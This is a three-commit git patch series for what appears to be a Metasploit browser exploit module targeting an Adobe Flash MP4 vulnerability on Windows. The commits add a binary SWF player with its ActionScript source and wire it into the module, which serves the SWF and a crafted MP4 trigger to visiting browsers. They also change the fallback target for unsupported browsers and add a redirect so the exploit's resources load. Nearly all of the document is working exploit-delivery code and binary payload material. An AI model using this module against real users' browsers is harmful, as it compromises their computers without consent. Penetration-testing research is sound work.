From b0db18674c06358a24b9630c17d319801d4f5f31 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 8 Mar 2012 15:05:12 -0600 Subject: [PATCH 1/3] Test out new player code --- data/exploits/mp4player.swf | Bin 0 -> 462 bytes .../windows/browser/adobe_flash_sps.rb | 29 +++++++++++++----- 2 files changed, 21 insertions(+), 8 deletions(-) create mode 100755 data/exploits/mp4player.swf diff --git a/data/exploits/mp4player.swf b/data/exploits/mp4player.swf new file mode 100755 index 0000000000000000000000000000000000000000..01f40382a92080b2323334944b6b129fa40ff7dc GIT binary patch literal 462 zcmV;<0WtnVS5pa>0ssJboNZB0Q`0~kec5c9r3DKeXL8W-=)r^I9}t*9K#LX-3Z{tS zr4!PHR?S!m6fbo*Y3V`tu(R*azJ0%>2dfSg&w*P8 zR;Hjelv4x3=?Y_w}2-xA*QpcsM=tXm)NMh@+q-vFXVsI-Y2RZ3J8#Ds&KpVF!LF1ovfK z_^5JO&QL29LjkeuaIak#vDRxTKqzX`lgBZ-tp*R_N$L5`-Sn*A*x@~iyX|NiQQ)28 z^NkT}Aa@5;@RN~M;xsh>SQ{}7;+daMHo&(K@Cb* zOWz3AkrY8qO0F!-ys7U}SKA1)s^f``G<=}s+-fBYCMst;jr>CJy|1ykm`s4#qcpa> zkT8%ez)l0kTwQ_XH5^74lub$b)G+?F05xz_=Uu79t${N1PNb%5uAcipwJq385&zcK z3ROhqN+~|p%H)X1-k)+EEEV(6C4h7E)P9k>uJ+q%Sp1Sdf1H(mul>n>;'video/mp4'}) return end + # The SWF request itself + if request.uri =~ /\.swf$/ + print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...") + send_response(cli, @swf, {'Content-Type'=>'flash/swf'}) + return + end + # Set payload depending on target p = payload.encoded @@ -140,8 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote end myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] - mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4" - swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}" + swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf" html = %Q| @@ -166,8 +170,17 @@ class Metasploit3 < Msf::Exploit::Remote def exploit @mp4 = create_mp4 + @swf = create_swf super end + + def create_swf + path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" ) + fd = ::File.open( path, "rb" ) + swf = fd.read(fd.stat.size) + fd.close + return swf + end def create_mp4 ftypAtom = "\x00\x00\x00\x20" #Size From 3e6cbe948613cdd81b5eef52118decf8afacf162 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 8 Mar 2012 15:23:10 -0600 Subject: [PATCH 2/3] Add source code to the player --- data/exploits/mp4player.as | 22 ++++++++++++++++++++++ data/exploits/mp4player.fla | Bin 0 -> 5211 bytes 2 files changed, 22 insertions(+) create mode 100644 data/exploits/mp4player.as create mode 100755 data/exploits/mp4player.fla diff --git a/data/exploits/mp4player.as b/data/exploits/mp4player.as new file mode 100644 index 0000000000..a0ace07a91 --- /dev/null +++ b/data/exploits/mp4player.as @@ -0,0 +1,22 @@ +function randText(newLength:Number):String{ + var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; + var alphabet:Array = a.split(""); + var randomLetter:String = ""; + for (var i:Number = 0; i < newLength; i++){ + randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)]; + } + return randomLetter; +} + +var connect_nc:NetConnection = new NetConnection(); +connect_nc.connect(null); + +var stream_ns:NetStream = new NetStream(connect_nc); +stream_ns.onStatus = function(p_evt:Object):Void { } + + +video.attachVideo(stream_ns); + +stream_ns.play(randText(Math.floor(Math.random() * 8) + 4) + ".mp4"); + + diff --git a/data/exploits/mp4player.fla b/data/exploits/mp4player.fla new file mode 100755 index 0000000000000000000000000000000000000000..5a77fb2f33c8c8dadfbb4e6c03329ab127f5fc64 GIT binary patch literal 5211 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 literal 0 HcmV?d00001 From 1271368b6f3fb0418006afadb3b43e9d614723a4 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 8 Mar 2012 15:37:06 -0600 Subject: [PATCH 3/3] Redirect to a trailing slash to make sure relative resources load properly --- modules/exploits/windows/browser/adobe_flash_sps.rb | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index ed682ede34..50ce693493 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}") #send_not_found(cli) #return - my_target = targets[0] + my_target = targets[1] end # The SWF requests our MP4 trigger @@ -108,7 +108,14 @@ class Metasploit3 < Msf::Exploit::Remote # The SWF request itself if request.uri =~ /\.swf$/ print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...") - send_response(cli, @swf, {'Content-Type'=>'flash/swf'}) + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'}) + return + end + + # Redirect to a trailing slash so relative paths work properly + if resource_uri != "/" and not request.uri.index("#{resource_uri}/") + uri = resource_uri + "/" + send_redirect(cli, uri) return end